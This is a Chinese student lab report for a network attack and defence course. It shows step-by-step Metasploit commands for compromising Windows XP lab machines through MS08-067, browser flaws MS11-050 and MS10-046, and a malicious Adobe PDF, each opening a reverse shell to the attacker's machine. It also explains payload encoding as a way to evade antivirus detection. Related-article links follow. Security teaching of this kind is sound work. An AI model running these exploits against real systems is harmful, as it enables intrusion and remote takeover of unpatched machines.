20165308『网络对抗技术』Exp5 MSF基础应用

一、原理与实践说明

实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

一个主动攻击实践,如ms08-067; (1分)

一个针对浏览器的攻击,如ms11-050;(1分)

一个针对客户端的攻击,如Adobe;(1分)

成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

实践内容

目录
主动攻击:ms08_067漏洞攻击
对浏览器攻击:ms10_046漏洞攻击
对Adobe的漏洞攻击:adobe_toolbutton
尝试利用漏洞对win7系统进行攻击

Windows服务渗透攻击——MS08-067安全漏洞

攻击机:Kali(IP地址:192.168.91.135)

靶机: windows XP(IP地址:192.168.91.134)

在攻击机kali输入 msfconsole 进入控制台,依次输入以下指令:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > show payloads
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(windows/smb/ms08_067_netapi) > set LPORT 5308 //攻击端口
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.91.134 //靶机ip,特定漏洞端口已经固定
msf exploit(windows/smb/ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(windows/smb/ms08_067_netapi) > exploit //攻击



建立会话,攻击成功结果如下:



针对浏览器的攻击:ms11_050

攻击机:kali (IP地址:192.168.91.135)

靶机:WindowsXP (IP地址:192.168.91.136)

在攻击机kali输入 msfconsole 进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement

info指令查看该模块的信息

targets信息

options信息

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_tcp //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5308 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH baidu //统一资源标识符路径设置
set target 1
msf exploit(ms11_050_cobjectelement) > exploit

攻击成功后会有靶机需要访问的网址

一直回连不成功,失败。所以机智地换了一个。

对浏览器攻击:ms10_046漏洞攻击

用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用该模块,再使用 show payloads 查看可以供我们使用的payload:

SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

使用exploit指令执行漏洞,可以看到生成了一个url:

使用exploit指令执行漏洞,可以看到生成了一个url:

在MSF终端看见漏洞执行成功:

针对Adobe Reader软件的渗透攻击——adobe_toolbutton

攻击机:kali

靶机:windowsXP

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

先用search adobe得知此漏洞所在的模块

选择一个模块



用show targets查看可以被攻击的靶机的操作系统型号

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5308//攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5308zsy.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit//攻击

找到5308zsy.pdf文件

将文件放到靶机上

在kali上进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp//tcp反向连接
msf exploit(handler) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(handler) > set LPORT 5308 //攻击端口固定
msf exploit(handler) > exploit

发现已经获取了被攻击者权力,可以对其进行操作

若关闭pdf文件,则失去权限,攻击失败

成功应用任何一个辅助模块(唯一)

输入命令show auxiliary查看所有辅助模块

选择其中一个即可

用指令info查看相关信息

进行扫描,结果如下图所示

实验感想

本次实验通过通过MSF的攻击模块对计算机进行各种攻击方法的实践,攻击的方法更深入。总是会有攻击不成功的地方,但是课上老师说不成功是很正常的事情,所以不会太崩溃。但是有些问题还是不能自己解决,还是要靠别人的帮助才能完成。

基础问题回答

用自己的话解释什么是exploit,payload,encode?

exploit:就是漏洞利用。有漏洞不一定就有Exploit但是有Exploit就肯定有漏洞。

payload:可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。

encode:编码,就是把代码重新包装一下让它尽量躲避查杀。

20165308『网络对抗技术』Exp5 MSF基础应用的更多相关文章

  1. 20155308『网络对抗技术』Exp5 MSF基础应用

    20155308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

  2. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实 ...

  3. 2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利 ...

  4. # 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...

  5. 2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...

  6. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  7. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  8. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  9. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

随机推荐

  1. ListBox多列显示,原来比较简单

    数据库的表中,如果有多个列要现实,而对应的是ListBox控件,一般情况下,ListBox是单列显示的, 例如 ListBox1.DataSource = dbcenter.accessGetData ...

  2. RPC 知识科普一下

    RPC概念及分类 RPC全称为Remote Procedure Call,翻译过来为“远程过程调用”.目前,主流的平台中都支持各种远程调用技术,以满足分布式系统架构中不同的系统之间的远程通信和相互调用 ...

  3. 关于redis的安装

    下载redis 我这边下载redis4.0.1版本, 然后解压 然后执行yum -y install gcc gcc-c++ libstdc++-devel 然后cd //qbtapp/redis-4 ...

  4. 2018-2019-2 《网络对抗技术》Exp1 PC平台逆向破解 20165326

    实验一 目录 直接修改程序机器指令,改变程序执行流程 通过构造输入参数,造成BOF攻击,改变程序执行流 注入Shellcode并执行 问题及解决 思想感悟 一.修改机器指令 首先你需要一个pwn1文件 ...

  5. 20175223 《Java程序设计》 第八周学习总结

    目录 教材学习内容总结 教材学习中的问题和解决过程 1. StarUML 的使用方法. 2. 在IDEA中以TDD的方式对String类和Arrays类进行学习 代码调试中的问题和解决过程 1. 问题 ...

  6. web传输过程中的gzip压缩

    最近在做项目的时候用到了gzip,发现它的压缩能力还是很强大的,基本能够压缩50%的文本文件大小.以前有所了解,但不够深入,现在详细了解下. 什么是gzip 在哪里使用gzip gzip对于不同类型文 ...

  7. LCA(tarjan)

    这是LCA算法中的一种,Tarjan算法 其实这么说也有点不对,应该是Tarjan+DFS进行解决 LCA又称为最近公共祖先 那么什么是最近公共祖先: 在一棵没有环的树上,每个节点肯定有其父亲节点和祖 ...

  8. Hadoop IO

    检测损坏数据的常用方法是第一次进入系统时计算数据的校验和,然后和传输后新生成的校验和进行匹配.若匹配失败,则认为数据被损坏了.常用CRC-32(cyclic redundancy check,循环冗余 ...

  9. 浅谈java中的String、StringBuffer、StringBuilder类的区别以及关系

    在java中最常见的使用就是对字符串的操作:首先先说一下对字符串的理解:字符串就是一连串字符序列,Java提供了String和StringBuffer两个类来封装字符串,并提供一系列方法来操作字符串对 ...

  10. Python学习第五堂课

    Python学习第五堂课推荐电影:华尔街之狼 被拯救的姜哥 阿甘正传 辛德勒的名单 肖申克的救赎 上帝之城 焦土之城 绝美之城 #上节内容: 变量 if else 注释 # ""& ...